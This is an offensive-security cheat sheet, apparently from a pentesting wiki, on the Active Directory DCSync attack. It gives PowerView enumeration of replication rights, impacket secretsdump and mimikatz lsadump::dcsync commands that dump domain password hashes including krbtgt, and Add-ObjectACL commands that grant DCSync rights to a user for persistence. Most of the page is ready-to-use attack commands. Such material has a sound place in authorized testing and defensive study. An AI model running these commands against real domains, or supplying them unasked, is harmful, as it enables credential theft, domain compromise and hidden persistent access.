DC Synchronization

The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled. By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges (Replicating Directory Changes, Replicating Directory Changes All and Replicating Directory Changes in Filtered Set).

Enumeration

With PowerView (a PowerSploit script and there are two versions: Old and New) enumerate for users with the required rights.

Get-ObjectAcl -DistinguishedName "DC=Security,DC=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

Get-ObjectACL "DC=security,DC=local" -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')}

Get-ObjectAcl -DistinguishedName "DC=Security,DC=local" -ResolveGUIDs | ?{($_.IdentityReference -match "<USER>") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}

We can take the individual SID's and attempt to identify the related User Principal Names (UPN's).

Get-ObjectAcl -Identity "dc=security,dc=local" -ResolveGUIDs | ? {$_.SecurityIdentifier -match "<SID>"

wmic useraccount get name,sid

Attack

Linux

With impacket-secretsdump.

secretsdump.py -just-dc <Domain>/<User>:<Password>@<IP> -outputfile dcsync_hashes

[-just-dc-user <USERNAME>] # To get only of that user
[-hashes <NTLM_HASH>] # To access with hash
[-pwd-last-set] # To see when each account's password was last changed
[-just-dc-ntlm] # Only NTLM hash
[-user-status] # check if a user is disabled
[-history] # To dump password history, may be helpful for offline password cracking

Windows

With mimikatz

lsadump::dcsync /domain:<Domain> /user:<Users-Hash-To-Dump>

lsadump::dcsync /user:krbtgt
lsadump::dcsync /domain:security.local /user:new_admin
lsadump::dcsync /user:security\krbtgt

Persistance

PowerView (a PowerSploit script and there are two versions: Old and New) can be used to give a user object the DCSync rights for future exploitation.

Add-ObjectACL -TargetDistinguishedName "DC=Security,DC=local" -PrincipalSamAccountName 'user' -Rights DCSync

Add-ObjectACL -PrincipalIdentity <USER> -Rights DCSync

Check

Get-ObjectAcl -DistinguishedName "DC=Security,DC=local" -ResolveGUIDs | ?{$_.IdentityReference -match "user"}

Last updated 9 months ago

Was this helpful?